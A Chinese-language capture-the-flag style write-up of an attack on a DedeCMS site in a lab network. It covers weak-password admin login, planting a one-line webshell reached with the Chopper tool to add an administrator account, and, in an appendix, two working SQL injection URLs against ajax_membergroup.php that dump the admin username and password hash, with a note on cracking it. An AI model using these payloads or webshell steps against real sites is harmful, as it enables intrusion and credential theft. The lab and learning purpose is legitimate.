环境说明:

    名字:网站综合***_dedecms

    环境:目标机:192.168.1.3

        织梦cms




开始***:


网站首页:

wKiom1mAi_ywXJSqAABn7zmgMEU883.png-wh_50



先去后台看看。看看默认后台dede在不在,答案是存在的,如下图

wKioL1mAjJSzAB6NAABriAr-rio914.png-wh_50


得到key2:

得到了后台,但是不知道密码,但是觉得这种实验环境后台密码应该都是弱口令

于是试了一下账号:admin 密码:admin123 登录成功:登录成功的地方会显示key2,但是一闪即逝,就不截图了。

wKioL1mAjYCy3yB_AACg-fsai7I074.png-wh_50

得到key4:

wKiom1mAj4jzZQdZAACo-QCAuiY467.png-wh_50

wKioL1mAj4mTomFyAAAuNQfmQMU682.png-wh_50



得到key1:

wKiom1mAkVzTECD9AACielGPruo566.png-wh_50


得到key3:在默认模板里

wKiom1mAk2vT9HfWAACnjVizGpU271.png-wh_50

wKiom1mAk1iB9aF5AAAUrbnEfNs146.png-wh_50

wKiom1mAk_3C8thrAAAi5yJ4l_E229.png-wh_50


得到key5:添加一个一句话***,用菜刀连接以后添加一个账户并且提到管理员权限。找到key5,修改为允许权限。得到key5

wKioL1mAmJDAQEURAABcOIa6axQ739.png-wh_50

wKiom1mAmJGig4ILAAAMjnY7zts591.png-wh_50

wKioL1mAmJHAGbqOAACXp3nmeSk576.png-wh_50



***结束:得到了5个key,但是key太长了,又没法复制,所以也就没提交。

加油



附录:


后来通过搜索,其实可以通过注入得到管理员账号密码:

爆管理员用户名的语句:

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

得到管理员用户名:admin

爆管理员密码的语句:

/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

得到密码:23a7bbd73250516f069d

爆出来的密码是20位,而md5是16位,去掉前边3位和最后1位即可得到16位的md5密文:7bbd73250516f069,直接解密即可



wKiom1mAmPDSXHeBAAQF1aT1ixQ560.png